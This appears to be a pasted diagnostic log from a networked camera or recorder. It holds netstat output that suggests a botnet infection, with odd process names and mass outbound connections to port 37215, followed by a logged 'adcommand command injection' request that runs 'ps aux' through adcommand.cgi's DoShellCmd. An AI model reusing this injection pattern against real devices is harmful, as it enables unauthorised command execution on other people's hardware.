Advertisement
Guest User

Untitled

a guest
Nov 2nd, 2018
261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 34.20 KB | None | 0 0
  1. Active Internet connections (servers and established)
  2. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  3. tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 2637/
  4. tcp 0 0 127.0.0.1:5544 0.0.0.0:* LISTEN 2194/CgiDaemon
  5. tcp 0 0 127.0.0.1:22698 0.0.0.0:* LISTEN 14446/7ztjzmpzh6ccg
  6. tcp 0 0 0.0.0.0:554 0.0.0.0:* LISTEN 2258/streamd
  7. tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2258/streamd
  8. tcp 0 0 127.0.0.1:9617 0.0.0.0:* LISTEN 27799/eDoeooRRAt
  9. tcp 0 0 0.0.0.0:988 0.0.0.0:* LISTEN 2447/glue
  10. tcp 0 450 192.168.1.99:57622 169.157.4.139:80 FIN_WAIT1 -
  11. tcp 0 827 192.168.1.99:34208 193.170.181.61:37215 FIN_WAIT1 -
  12. tcp 0 750 192.168.1.99:54876 197.214.132.248:8081 FIN_WAIT1 -
  13. tcp 0 827 192.168.1.99:40922 103.45.28.245:37215 FIN_WAIT1 -
  14. tcp 0 807 192.168.1.99:36491 156.236.64.244:37215 FIN_WAIT1 -
  15. tcp 0 827 192.168.1.99:44316 36.252.134.238:37215 FIN_WAIT1 -
  16. tcp 0 827 192.168.1.99:34653 183.60.233.112:37215 FIN_WAIT1 -
  17. tcp 0 827 192.168.1.99:43063 103.42.37.11:37215 FIN_WAIT1 -
  18. tcp 0 827 192.168.1.99:58902 103.61.168.136:37215 FIN_WAIT1 -
  19. tcp 0 481 192.168.1.99:32931 156.99.15.73:37215 FIN_WAIT1 -
  20. tcp 0 450 192.168.1.99:58246 113.198.33.122:80 FIN_WAIT1 -
  21. tcp 0 1 192.168.1.99:55747 103.88.92.159:37215 FIN_WAIT1 -
  22. tcp 0 450 192.168.1.99:40710 145.89.12.20:80 FIN_WAIT1 -
  23. tcp 0 450 192.168.1.99:39496 118.230.32.233:80 FIN_WAIT1 -
  24. tcp 0 827 192.168.1.99:49314 43.226.47.117:37215 FIN_WAIT1 -
  25. tcp 0 450 192.168.1.99:47190 132.190.105.162:80 FIN_WAIT1 -
  26. tcp 0 1 192.168.1.99:54890 103.205.161.71:37215 FIN_WAIT1 -
  27. tcp 0 1 192.168.1.99:37746 207.163.29.206:37215 FIN_WAIT1 -
  28. tcp 0 827 192.168.1.99:54792 117.34.115.230:37215 FIN_WAIT1 -
  29. tcp 0 1 192.168.1.99:32933 156.99.15.73:37215 FIN_WAIT1 -
  30. tcp 0 827 192.168.1.99:48461 103.107.238.41:37215 FIN_WAIT1 -
  31. tcp 0 450 192.168.1.99:34418 137.195.216.38:80 FIN_WAIT1 -
  32. tcp 0 827 192.168.1.99:55309 103.74.193.48:37215 FIN_WAIT1 -
  33. tcp 0 1 192.168.1.99:34021 207.163.20.59:37215 FIN_WAIT1 -
  34. tcp 0 827 192.168.1.99:35800 111.223.12.41:37215 FIN_WAIT1 -
  35. tcp 0 1 192.168.1.99:34218 193.170.181.61:37215 FIN_WAIT1 -
  36. tcp 0 827 192.168.1.99:40422 103.59.146.30:37215 FIN_WAIT1 -
  37. tcp 0 1 192.168.1.99:40037 187.254.209.206:37215 FIN_WAIT1 -
  38. tcp 0 1 192.168.1.99:53031 197.214.229.251:37215 FIN_WAIT1 -
  39. tcp 0 827 192.168.1.99:49739 207.62.235.4:37215 FIN_WAIT1 -
  40. tcp 0 827 192.168.1.99:50808 103.63.4.105:37215 FIN_WAIT1 -
  41. tcp 0 0 192.168.1.99:44900 188.166.114.53:4456 ESTABLISHED 14446/7ztjzmpzh6ccg
  42. tcp 0 481 192.168.1.99:42473 197.189.222.8:37215 FIN_WAIT1 -
  43. tcp 0 827 192.168.1.99:42569 207.190.162.87:37215 FIN_WAIT1 -
  44. tcp 0 807 192.168.1.99:55864 197.214.137.36:37215 FIN_WAIT1 -
  45. tcp 0 827 192.168.1.99:38600 197.214.133.63:37215 FIN_WAIT1 -
  46. tcp 0 450 192.168.1.99:60532 194.254.252.220:80 FIN_WAIT1 -
  47. tcp 0 1 192.168.1.99:54119 244.25.150.33:33 SYN_SENT 433/dropbear
  48. tcp 0 827 192.168.1.99:60614 43.226.76.62:37215 FIN_WAIT1 -
  49. tcp 0 827 192.168.1.99:50395 207.190.167.243:37215 FIN_WAIT1 -
  50. tcp 0 827 192.168.1.99:38949 213.102.203.215:37215 FIN_WAIT1 -
  51. tcp 0 0 192.168.1.99:49498 217.42.93.73:8081 TIME_WAIT -
  52. tcp 0 827 192.168.1.99:44522 103.72.155.28:37215 FIN_WAIT1 -
  53. tcp 0 1 192.168.1.99:60882 207.163.23.123:37215 FIN_WAIT1 -
  54. tcp 0 807 192.168.1.99:41697 197.214.195.91:37215 FIN_WAIT1 -
  55. tcp 0 827 192.168.1.99:38686 223.111.134.122:37215 FIN_WAIT1 -
  56. tcp 0 0 192.168.1.99:58627 189.253.214.242:80 TIME_WAIT -
  57. tcp 0 1 192.168.1.99:56231 103.200.21.23:37215 FIN_WAIT1 -
  58. tcp 0 827 192.168.1.99:39743 103.68.180.233:37215 FIN_WAIT1 -
  59. tcp 0 481 192.168.1.99:43194 213.179.72.173:37215 FIN_WAIT1 -
  60. tcp 0 827 192.168.1.99:34370 117.21.191.53:37215 FIN_WAIT1 -
  61. tcp 0 450 192.168.1.99:37325 115.130.53.173:80 FIN_WAIT1 -
  62. tcp 0 1 192.168.1.99:41949 213.91.196.68:37215 FIN_WAIT1 -
  63. tcp 0 827 192.168.1.99:36028 223.27.208.220:37215 FIN_WAIT1 -
  64. tcp 0 827 192.168.1.99:42128 103.68.180.191:37215 FIN_WAIT1 -
  65. tcp 0 827 192.168.1.99:58844 43.229.120.22:37215 FIN_WAIT1 -
  66. tcp 0 450 192.168.1.99:53890 148.231.250.195:80 FIN_WAIT1 -
  67. tcp 0 450 192.168.1.99:38812 212.93.108.222:80 FIN_WAIT1 -
  68. tcp 0 827 192.168.1.99:59179 201.161.180.123:37215 FIN_WAIT1 -
  69. tcp 0 1 192.168.1.99:34427 207.163.166.105:37215 FIN_WAIT1 -
  70. tcp 0 827 192.168.1.99:52765 183.131.72.248:37215 FIN_WAIT1 -
  71. tcp 0 827 192.168.1.99:50791 213.39.123.247:37215 FIN_WAIT1 -
  72. tcp 0 1 192.168.1.99:40735 120.88.51.226:37215 FIN_WAIT1 -
  73. tcp 0 1 192.168.1.99:55152 213.119.198.120:37215 FIN_WAIT1 -
  74. tcp 0 450 192.168.1.99:48911 101.117.97.180:80 FIN_WAIT1 -
  75. tcp 0 827 192.168.1.99:59716 103.56.27.189:37215 FIN_WAIT1 -
  76. tcp 0 827 192.168.1.99:46737 103.14.102.38:37215 FIN_WAIT1 -
  77. tcp 0 450 192.168.1.99:35273 132.190.21.21:80 FIN_WAIT1 -
  78. tcp 0 0 192.168.1.99:60872 111.6.169.187:80 TIME_WAIT -
  79. tcp 0 827 192.168.1.99:33997 36.253.77.228:37215 FIN_WAIT1 -
  80. tcp 0 1 192.168.1.99:33982 207.141.70.60:37215 FIN_WAIT1 -
  81. tcp 0 827 192.168.1.99:53235 207.195.43.31:37215 FIN_WAIT1 -
  82. tcp 0 827 192.168.1.99:33333 103.248.154.52:37215 FIN_WAIT1 -
  83. tcp 0 827 192.168.1.99:53687 120.88.49.217:37215 FIN_WAIT1 -
  84. tcp 0 827 192.168.1.99:38886 197.214.231.40:37215 FIN_WAIT1 -
  85. tcp 0 827 192.168.1.99:41069 103.205.253.130:37215 FIN_WAIT1 -
  86. tcp 0 450 192.168.1.99:49536 115.130.4.37:80 FIN_WAIT1 -
  87. tcp 0 827 192.168.1.99:52656 103.71.236.245:37215 FIN_WAIT1 -
  88. tcp 0 827 192.168.1.99:47955 103.24.94.69:37215 FIN_WAIT1 -
  89. tcp 0 827 192.168.1.99:46869 43.243.209.187:37215 FIN_WAIT1 -
  90. tcp 0 1 192.168.1.99:47523 197.214.158.16:37215 FIN_WAIT1 -
  91. tcp 0 827 192.168.1.99:58073 218.241.8.103:37215 FIN_WAIT1 -
  92. tcp 0 1 192.168.1.99:54471 207.190.177.214:37215 FIN_WAIT1 -
  93. tcp 0 827 192.168.1.99:40734 120.88.51.226:37215 FIN_WAIT1 -
  94. tcp 0 827 192.168.1.99:60860 120.88.51.41:37215 FIN_WAIT1 -
  95. tcp 0 0 192.168.1.99:80 62.210.105.116:45809 TIME_WAIT -
  96. tcp 0 827 192.168.1.99:45166 120.88.50.241:37215 FIN_WAIT1 -
  97. tcp 0 807 192.168.1.99:43019 197.214.157.58:37215 FIN_WAIT1 -
  98. tcp 0 1 192.168.1.99:45655 207.163.18.56:37215 FIN_WAIT1 -
  99. tcp 0 1 192.168.1.99:40620 197.214.173.111:37215 FIN_WAIT1 -
  100. tcp 0 450 192.168.1.99:56962 115.129.231.11:80 FIN_WAIT1 -
  101. tcp 0 807 192.168.1.99:35260 197.214.205.176:37215 FIN_WAIT1 -
  102. tcp 0 0 127.0.0.1:5544 127.0.0.1:47181 TIME_WAIT -
  103. tcp 0 827 192.168.1.99:52139 103.10.174.208:37215 FIN_WAIT1 -
  104. tcp 0 827 192.168.1.99:56469 43.242.128.91:37215 FIN_WAIT1 -
  105. tcp 0 827 192.168.1.99:46617 103.230.237.30:37215 FIN_WAIT1 -
  106. tcp 0 827 192.168.1.99:47649 103.75.243.162:37215 FIN_WAIT1 -
  107. tcp 0 827 192.168.1.99:55141 213.119.198.120:37215 FIN_WAIT1 -
  108. tcp 0 450 192.168.1.99:36760 164.125.196.147:80 FIN_WAIT1 -
  109. tcp 0 1 192.168.1.99:34838 207.163.17.136:37215 FIN_WAIT1 -
  110. tcp 0 1 192.168.1.99:50793 213.39.123.247:37215 FIN_WAIT1 -
  111. tcp 0 1 192.168.1.99:36711 193.170.180.253:37215 FIN_WAIT1 -
  112. tcp 0 827 192.168.1.99:56225 103.200.21.23:37215 FIN_WAIT1 -
  113. tcp 0 1 192.168.1.99:46380 197.214.245.172:8081 FIN_WAIT1 -
  114. tcp 0 827 192.168.1.99:38666 112.175.242.46:37215 FIN_WAIT1 -
  115. tcp 0 0 192.168.1.99:36629 197.49.198.74:37215 TIME_WAIT -
  116. tcp 0 1 192.168.1.99:32973 207.163.245.255:37215 FIN_WAIT1 -
  117. tcp 0 0 192.168.1.99:60617 197.99.31.199:8081 TIME_WAIT -
  118. tcp 0 450 192.168.1.99:49124 47.19.52.5:80 FIN_WAIT1 -
  119. tcp 0 750 192.168.1.99:60755 197.115.20.135:8081 FIN_WAIT1 -
  120. tcp 0 827 192.168.1.99:59301 103.104.199.36:37215 FIN_WAIT1 -
  121. tcp 0 1 192.168.1.99:45183 120.88.50.241:37215 FIN_WAIT1 -
  122. tcp 0 1 192.168.1.99:50396 207.190.167.243:37215 FIN_WAIT1 -
  123. tcp 0 0 192.168.1.99:46618 41.78.120.127:37215 TIME_WAIT -
  124. tcp 0 827 192.168.1.99:57281 103.56.19.109:37215 FIN_WAIT1 -
  125. tcp 0 827 192.168.1.99:47586 207.163.28.8:37215 FIN_WAIT1 -
  126. tcp 0 0 127.0.0.1:5544 127.0.0.1:47172 TIME_WAIT -
  127. tcp 0 827 192.168.1.99:54463 207.190.177.214:37215 FIN_WAIT1 -
  128. tcp 0 450 192.168.1.99:33366 202.82.142.44:80 FIN_WAIT1 -
  129. tcp 0 1 192.168.1.99:48466 103.107.238.41:37215 FIN_WAIT1 -
  130. tcp 0 807 192.168.1.99:47504 197.214.158.16:37215 FIN_WAIT1 -
  131. tcp 0 450 192.168.1.99:50938 150.32.99.208:80 FIN_WAIT1 -
  132. tcp 0 750 192.168.1.99:45367 197.214.155.23:8081 FIN_WAIT1 -
  133. tcp 0 1 192.168.1.99:36439 211.137.217.81:37215 FIN_WAIT1 -
  134. tcp 0 827 192.168.1.99:49789 103.195.119.132:37215 FIN_WAIT1 -
  135. tcp 0 827 192.168.1.99:45354 111.92.186.156:37215 FIN_WAIT1 -
  136. tcp 0 807 192.168.1.99:51497 156.236.64.129:37215 FIN_WAIT1 -
  137. tcp 0 827 192.168.1.99:55969 193.140.11.76:37215 FIN_WAIT1 -
  138. tcp 0 827 192.168.1.99:58426 43.226.65.234:37215 FIN_WAIT1 -
  139. tcp 0 1 192.168.1.99:56964 197.214.185.2:8081 FIN_WAIT1 -
  140. tcp 0 1 192.168.1.99:46106 207.190.191.116:37215 FIN_WAIT1 -
  141. tcp 0 827 192.168.1.99:32796 103.235.19.21:37215 FIN_WAIT1 -
  142. tcp 0 0 192.168.1.99:60078 197.231.147.59:8081 TIME_WAIT -
  143. tcp 0 827 192.168.1.99:48939 36.252.28.214:37215 FIN_WAIT1 -
  144. tcp 0 0 127.0.0.1:5544 127.0.0.1:47194 ESTABLISHED 30628/CloudSetup.cg
  145. tcp 0 450 192.168.1.99:35852 94.177.128.242:80 FIN_WAIT1 -
  146. tcp 0 0 192.168.1.99:49462 66.85.157.90:443 FIN_WAIT2 -
  147. tcp 0 1 192.168.1.99:38611 197.214.133.63:37215 FIN_WAIT1 -
  148. tcp 0 0 192.168.1.99:56392 217.46.124.122:8081 TIME_WAIT -
  149. tcp 0 1 192.168.1.99:45231 156.234.224.63:37215 FIN_WAIT1 -
  150. tcp 0 1 192.168.1.99:36035 223.27.208.220:37215 FIN_WAIT1 -
  151. tcp 0 450 192.168.1.99:57132 65.215.121.38:80 FIN_WAIT1 -
  152. tcp 0 750 192.168.1.99:59549 197.115.104.161:8081 FIN_WAIT1 -
  153. tcp 0 450 192.168.1.99:50902 203.205.124.141:80 FIN_WAIT1 -
  154. tcp 0 827 192.168.1.99:33373 36.253.38.65:37215 FIN_WAIT1 -
  155. tcp 0 827 192.168.1.99:48462 213.119.254.31:37215 FIN_WAIT1 -
  156. tcp 0 827 192.168.1.99:60502 218.17.20.105:37215 FIN_WAIT1 -
  157. tcp 0 0 127.0.0.1:5544 127.0.0.1:47173 TIME_WAIT -
  158. tcp 0 1 192.168.1.99:44401 207.163.238.103:37215 FIN_WAIT1 -
  159. tcp 0 827 192.168.1.99:37742 207.163.29.206:37215 FIN_WAIT1 -
  160. tcp 0 1 192.168.1.99:49108 207.163.24.201:37215 FIN_WAIT1 -
  161. tcp 0 450 192.168.1.99:57443 124.173.159.229:80 FIN_WAIT1 -
  162. tcp 0 450 192.168.1.99:49805 148.231.228.132:80 FIN_WAIT1 -
  163. tcp 0 0 127.0.0.1:5544 127.0.0.1:46897 TIME_WAIT -
  164. tcp 0 827 192.168.1.99:36438 211.137.217.81:37215 FIN_WAIT1 -
  165. tcp 0 0 192.168.1.99:49338 41.226.146.68:37215 TIME_WAIT -
  166. tcp 0 827 192.168.1.99:42077 103.207.24.204:37215 FIN_WAIT1 -
  167. tcp 0 827 192.168.1.99:57974 213.119.254.20:37215 FIN_WAIT1 -
  168. tcp 0 827 192.168.1.99:36705 193.170.180.253:37215 FIN_WAIT1 -
  169. tcp 0 1 192.168.1.99:43200 213.179.72.173:37215 FIN_WAIT1 -
  170. tcp 0 1 192.168.1.99:37614 207.163.234.186:37215 FIN_WAIT1 -
  171. tcp 0 827 192.168.1.99:45657 103.230.237.106:37215 FIN_WAIT1 -
  172. tcp 0 1 192.168.1.99:41717 197.214.195.91:37215 FIN_WAIT1 -
  173. tcp 0 1 192.168.1.99:48467 213.119.254.31:37215 FIN_WAIT1 -
  174. tcp 0 1 192.168.1.99:39939 207.62.234.21:37215 FIN_WAIT1 -
  175. tcp 0 1 192.168.1.99:53243 207.195.43.31:37215 FIN_WAIT1 -
  176. tcp 0 0 127.0.0.1:47055 127.0.0.1:5544 ESTABLISHED 2258/streamd
  177. tcp 0 450 192.168.1.99:52672 84.91.173.109:80 FIN_WAIT1 -
  178. tcp 0 827 192.168.1.99:42938 213.82.80.93:37215 FIN_WAIT1 -
  179. tcp 0 1 192.168.1.99:47661 103.75.243.162:37215 FIN_WAIT1 -
  180. tcp 0 0 127.0.0.1:5544 127.0.0.1:47090 TIME_WAIT -
  181. tcp 0 1 192.168.1.99:42940 213.82.80.93:37215 FIN_WAIT1 -
  182. tcp 0 827 192.168.1.99:41699 103.91.200.20:37215 FIN_WAIT1 -
  183. tcp 0 1 192.168.1.99:40995 213.91.196.101:37215 FIN_WAIT1 -
  184. tcp 0 827 192.168.1.99:39935 207.62.234.21:37215 FIN_WAIT1 -
  185. tcp 0 1 192.168.1.99:45298 113.106.89.94:37215 FIN_WAIT1 -
  186. tcp 0 827 192.168.1.99:33980 207.141.70.60:37215 FIN_WAIT1 -
  187. tcp 0 827 192.168.1.99:44399 207.163.238.103:37215 FIN_WAIT1 -
  188. tcp 0 1 192.168.1.99:45370 197.214.155.23:8081 FIN_WAIT1 -
  189. tcp 0 807 192.168.1.99:34867 156.203.117.196:37215 FIN_WAIT1 -
  190. tcp 0 1 192.168.1.99:35013 197.214.237.225:8081 FIN_WAIT1 -
  191. tcp 0 827 192.168.1.99:39947 113.106.95.173:37215 FIN_WAIT1 -
  192. tcp 0 0 127.0.0.1:45289 127.0.0.1:554 TIME_WAIT -
  193. tcp 0 1 192.168.1.99:34900 156.203.117.196:37215 FIN_WAIT1 -
  194. tcp 0 807 192.168.1.99:53015 197.214.229.251:37215 FIN_WAIT1 -
  195. tcp 0 750 192.168.1.99:46373 197.214.245.172:8081 FIN_WAIT1 -
  196. tcp 0 827 192.168.1.99:40030 187.254.209.206:37215 FIN_WAIT1 -
  197. tcp 0 750 192.168.1.99:56958 197.214.185.2:8081 FIN_WAIT1 -
  198. tcp 0 827 192.168.1.99:47389 103.31.243.184:37215 FIN_WAIT1 -
  199. tcp 0 0 192.168.1.99:80 42.115.76.220:64251 TIME_WAIT -
  200. tcp 0 1 192.168.1.99:55495 207.190.185.114:37215 FIN_WAIT1 -
  201. tcp 0 1 192.168.1.99:60232 213.179.76.23:37215 FIN_WAIT1 -
  202. tcp 0 0 192.168.1.99:36044 208.12.74.102:80 TIME_WAIT -
  203. tcp 0 1 192.168.1.99:59182 201.161.180.123:37215 FIN_WAIT1 -
  204. tcp 0 827 192.168.1.99:47614 207.62.238.252:37215 FIN_WAIT1 -
  205. tcp 0 807 192.168.1.99:58399 197.214.250.124:37215 FIN_WAIT1 -
  206. tcp 0 1 192.168.1.99:45872 43.250.188.21:37215 SYN_SENT 14452/7ztjzmpzh6ccg
  207. tcp 0 1 192.168.1.99:42486 197.189.222.8:37215 FIN_WAIT1 -
  208. tcp 0 450 192.168.1.99:60077 104.18.190.101:80 FIN_WAIT1 -
  209. tcp 0 0 192.168.1.99:35935 185.244.25.150:33 ESTABLISHED 11710/dropbear
  210. tcp 0 1 192.168.1.99:49742 207.62.235.4:37215 FIN_WAIT1 -
  211. tcp 0 1 192.168.1.99:57985 213.119.254.20:37215 FIN_WAIT1 -
  212. tcp 0 0 192.168.1.99:53318 199.247.7.233:234 ESTABLISHED 7749/armv7l
  213. tcp 0 0 192.168.1.99:42884 41.230.141.177:37215 TIME_WAIT -
  214. tcp 0 827 192.168.1.99:60880 207.163.23.123:37215 FIN_WAIT1 -
  215. tcp 0 1 192.168.1.99:46446 61.14.189.66:80 FIN_WAIT1 -
  216. tcp 0 1 192.168.1.99:50180 36.255.193.247:37215 FIN_WAIT1 -
  217. tcp 0 0 192.168.1.99:80 42.115.76.220:64250 TIME_WAIT -
  218. tcp 0 827 192.168.1.99:53173 103.193.246.76:37215 FIN_WAIT1 -
  219. tcp 0 827 192.168.1.99:32972 207.163.245.255:37215 FIN_WAIT1 -
  220. tcp 0 0 192.168.1.99:36873 197.2.32.253:37215 TIME_WAIT -
  221. tcp 0 827 192.168.1.99:33058 103.75.243.116:37215 FIN_WAIT1 -
  222. tcp 0 827 192.168.1.99:50559 207.62.238.119:37215 FIN_WAIT1 -
  223. tcp 0 1 192.168.1.99:58412 197.214.250.124:37215 FIN_WAIT1 -
  224. tcp 0 827 192.168.1.99:45865 43.250.188.21:37215 FIN_WAIT1 -
  225. tcp 0 827 192.168.1.99:37609 207.163.234.186:37215 FIN_WAIT1 -
  226. tcp 0 827 192.168.1.99:41944 213.91.196.68:37215 FIN_WAIT1 -
  227. tcp 0 1 192.168.1.99:36811 183.3.205.243:37215 FIN_WAIT1 -
  228. tcp 0 1 192.168.1.99:50506 197.214.204.107:37215 FIN_WAIT1 -
  229. tcp 0 1 192.168.1.99:53303 120.55.39.42:37215 FIN_WAIT1 -
  230. tcp 0 1 192.168.1.99:53691 120.88.49.217:37215 FIN_WAIT1 -
  231. tcp 0 827 192.168.1.99:59956 213.100.158.244:37215 FIN_WAIT1 -
  232. tcp 0 0 192.168.1.99:42265 197.0.46.244:37215 TIME_WAIT -
  233. tcp 0 0 192.168.1.99:80 42.115.76.220:64242 TIME_WAIT -
  234. tcp 0 1 192.168.1.99:47589 207.163.28.8:37215 FIN_WAIT1 -
  235. tcp 0 1 192.168.1.99:37105 197.214.227.55:37215 FIN_WAIT1 -
  236. tcp 0 827 192.168.1.99:41407 120.41.33.201:37215 FIN_WAIT1 -
  237. tcp 0 0 192.168.1.99:48568 217.63.203.53:8081 TIME_WAIT -
  238. tcp 0 750 192.168.1.99:36202 197.115.9.243:8081 FIN_WAIT1 -
  239. tcp 0 1 192.168.1.99:60863 120.88.51.41:37215 FIN_WAIT1 -
  240. tcp 0 450 192.168.1.99:38014 115.129.178.128:80 FIN_WAIT1 -
  241. tcp 0 827 192.168.1.99:48930 103.199.247.83:37215 FIN_WAIT1 -
  242. tcp 0 827 192.168.1.99:45650 207.163.18.56:37215 FIN_WAIT1 -
  243. tcp 0 827 192.168.1.99:40984 213.91.196.101:37215 FIN_WAIT1 -
  244. tcp 0 481 192.168.1.99:59068 213.179.73.222:37215 FIN_WAIT1 -
  245. tcp 0 750 192.168.1.99:44900 217.111.198.13:8081 FIN_WAIT1 -
  246. tcp 0 1 192.168.1.99:43022 197.214.157.58:37215 FIN_WAIT1 -
  247. tcp 0 0 127.0.0.1:47194 127.0.0.1:5544 ESTABLISHED 2258/streamd
  248. tcp 0 827 192.168.1.99:40249 213.119.196.4:37215 FIN_WAIT1 -
  249. tcp 0 827 192.168.1.99:34331 103.27.176.86:37215 FIN_WAIT1 -
  250. tcp 0 1 192.168.1.99:35265 197.214.205.176:37215 FIN_WAIT1 -
  251. tcp 0 750 192.168.1.99:35009 197.214.237.225:8081 FIN_WAIT1 -
  252. tcp 0 0 127.0.0.1:5544 127.0.0.1:46887 TIME_WAIT -
  253. tcp 0 0 127.0.0.1:5544 127.0.0.1:47186 TIME_WAIT -
  254. tcp 0 450 192.168.1.99:46019 128.135.194.97:80 FIN_WAIT1 -
  255. tcp 0 807 192.168.1.99:40611 197.214.173.111:37215 FIN_WAIT1 -
  256. tcp 0 450 192.168.1.99:46854 137.195.168.101:80 FIN_WAIT1 -
  257. tcp 0 1 192.168.1.99:44905 217.111.198.13:8081 FIN_WAIT1 -
  258. tcp 0 827 192.168.1.99:34010 207.163.20.59:37215 FIN_WAIT1 -
  259. tcp 0 0 192.168.1.99:80 42.115.76.220:64245 ESTABLISHED 2258/streamd
  260. tcp 0 807 192.168.1.99:45228 156.234.224.63:37215 FIN_WAIT1 -
  261. tcp 0 827 192.168.1.99:50179 36.255.193.247:37215 FIN_WAIT1 -
  262. tcp 0 1 192.168.1.99:36209 197.115.9.243:8081 FIN_WAIT1 -
  263. tcp 0 0 192.168.1.99:49710 66.85.157.90:443 FIN_WAIT2 -
  264. tcp 0 1 192.168.1.99:38690 223.111.134.122:37215 FIN_WAIT1 -
  265. tcp 0 0 192.168.1.99:48264 197.184.104.167:8081 TIME_WAIT -
  266. tcp 0 1 192.168.1.99:50572 207.62.238.119:37215 FIN_WAIT1 -
  267. tcp 0 0 192.168.1.99:59361 54.251.104.157:443 ESTABLISHED 761/natt
  268. tcp 0 1 192.168.1.99:38956 213.102.203.215:37215 FIN_WAIT1 -
  269. tcp 0 1 192.168.1.99:54109 244.25.150.33:33 SYN_SENT 3631/dropbear
  270. tcp 0 1 192.168.1.99:55876 197.214.137.36:37215 FIN_WAIT1 -
  271. tcp 0 827 192.168.1.99:36227 43.226.40.57:37215 FIN_WAIT1 -
  272. tcp 0 0 192.168.1.99:56288 120.221.73.23:80 TIME_WAIT -
  273. tcp 0 0 192.168.1.99:53048 35.226.33.66:80 TIME_WAIT -
  274. tcp 0 1 192.168.1.99:42573 207.190.162.87:37215 FIN_WAIT1 -
  275. tcp 0 827 192.168.1.99:55487 207.190.185.114:37215 FIN_WAIT1 -
  276. tcp 0 0 127.0.0.1:5544 127.0.0.1:47055 ESTABLISHED 30447/NetworkBk.cgi
  277. tcp 0 827 192.168.1.99:35081 103.197.219.199:37215 FIN_WAIT1 -
  278. tcp 0 1 192.168.1.99:60774 197.115.20.135:8081 FIN_WAIT1 -
  279. tcp 0 0 192.168.1.99:80 62.210.105.116:43731 ESTABLISHED 2258/streamd
  280. tcp 0 827 192.168.1.99:49104 207.163.24.201:37215 FIN_WAIT1 -
  281. tcp 0 1 192.168.1.99:54889 197.214.132.248:8081 FIN_WAIT1 -
  282. tcp 0 450 192.168.1.99:52719 140.127.25.82:80 FIN_WAIT1 -
  283. tcp 0 827 192.168.1.99:36809 183.3.205.243:37215 FIN_WAIT1 -
  284. tcp 0 450 192.168.1.99:51753 128.165.53.76:80 FIN_WAIT1 -
  285. tcp 0 827 192.168.1.99:49025 36.250.79.202:37215 FIN_WAIT1 -
  286. tcp 0 827 192.168.1.99:50087 103.205.165.29:37215 FIN_WAIT1 -
  287. tcp 0 827 192.168.1.99:45291 113.106.89.94:37215 FIN_WAIT1 -
  288. tcp 0 481 192.168.1.99:60228 213.179.76.23:37215 FIN_WAIT1 -
  289. tcp 0 827 192.168.1.99:54882 103.205.161.71:37215 FIN_WAIT1 -
  290. tcp 0 827 192.168.1.99:46104 207.190.191.116:37215 FIN_WAIT1 -
  291. tcp 0 807 192.168.1.99:37100 197.214.227.55:37215 FIN_WAIT1 -
  292. tcp 0 0 192.168.1.99:53203 173.243.3.112:80 TIME_WAIT -
  293. tcp 0 0 127.0.0.1:5544 127.0.0.1:47178 TIME_WAIT -
  294. tcp 0 0 192.168.1.99:59216 197.99.84.32:8081 TIME_WAIT -
  295. tcp 0 827 192.168.1.99:36865 39.109.29.121:37215 FIN_WAIT1 -
  296. tcp 0 827 192.168.1.99:53018 103.107.238.154:37215 FIN_WAIT1 -
  297. tcp 0 0 192.168.1.99:46610 41.78.120.127:37215 TIME_WAIT -
  298. tcp 0 0 192.168.1.99:38260 217.147.52.195:8081 TIME_WAIT -
  299. tcp 0 450 192.168.1.99:47633 118.98.178.126:80 FIN_WAIT1 -
  300. tcp 0 827 192.168.1.99:34424 207.163.166.105:37215 FIN_WAIT1 -
  301. tcp 0 827 192.168.1.99:55738 103.88.92.159:37215 FIN_WAIT1 -
  302. tcp 0 0 192.168.1.99:38288 217.147.52.195:8081 TIME_WAIT -
  303. tcp 0 827 192.168.1.99:46189 43.226.39.34:37215 FIN_WAIT1 -
  304. tcp 0 827 192.168.1.99:51610 103.205.1.33:37215 FIN_WAIT1 -
  305. tcp 0 827 192.168.1.99:51418 113.141.163.223:37215 FIN_WAIT1 -
  306. tcp 0 481 192.168.1.99:39367 213.179.72.44:37215 FIN_WAIT1 -
  307. tcp 0 0 192.168.1.99:49877 217.43.117.171:8081 TIME_WAIT -
  308. tcp 0 450 192.168.1.99:50776 140.206.95.117:80 FIN_WAIT1 -
  309. tcp 0 1 192.168.1.99:38889 197.214.231.40:37215 FIN_WAIT1 -
  310. tcp 0 827 192.168.1.99:54629 120.210.205.213:37215 FIN_WAIT1 -
  311. tcp 0 827 192.168.1.99:34836 207.163.17.136:37215 FIN_WAIT1 -
  312. tcp 0 450 192.168.1.99:48554 205.235.214.160:80 FIN_WAIT1 -
  313. tcp 0 450 192.168.1.99:48208 122.102.12.119:80 FIN_WAIT1 -
  314. tcp 0 827 192.168.1.99:50493 197.214.204.107:37215 FIN_WAIT1 -
  315. tcp 0 827 192.168.1.99:58554 103.230.108.241:37215 FIN_WAIT1 -
  316. tcp 0 827 192.168.1.99:45009 218.98.115.97:37215 FIN_WAIT1 -
  317. udp 0 0 192.168.1.99:50778 0.0.0.0:* 2258/streamd
  318. udp 0 0 0.0.0.0:7777 0.0.0.0:* 1900/searchd
  319. udp 0 0 0.0.0.0:1900 0.0.0.0:* 483/minissdpd
  320. udp 0 0 192.168.1.99:123 0.0.0.0:* 19990/ntpd
  321. udp 0 0 127.0.0.1:123 0.0.0.0:* 19990/ntpd
  322. udp 0 0 0.0.0.0:123 0.0.0.0:* 19990/ntpd
  323.  
  324. adcommand command injection
  325. HttpActionD adcommand.cgi
  326. Post context : DoShellCmd "strCmd=ps aux&"
  327. get Command:DoShellCmd
  328. get Param : "strCmd=ps aux&"
  329. unix:abstract=/tmp/dbus-s5ZjtiPt1k,guid=272b2b83596a25b1809566cc5bcbc972
  330. Reply:strResult="PID USER TIME COMMAND
  331. 1 root 0:30 init
  332. 2 root 0:00 [kthreadd]
  333. 3 root 62:05 [ksoftirqd/0]
  334. 5 root 0:00 [kworker/0:0H]
  335. 7 root 0:00 [khelper]
  336. 157 root 0:00 [writeback]
  337. 159 root 0:00 [bioset]
  338. 161 root 0:00 [kblockd]
  339. 167 root 0:00 [ata_sff]
  340. 174 root 0:00 [spi0]
  341. 181 root 0:00 [khubd]
  342. 269 root 0:00 [cfinteractive]
  343. 270 root 0:00 [rpciod]
  344. 281 root 0:03 [kswapd0]
  345. 327 root 0:00 [fsnotify_mark]
  346. 343 root 0:00 [nfsiod]
  347. 361 root 0:00 [xfsalloc]
  348. 362 root 0:00 [xfs_mru_cache]
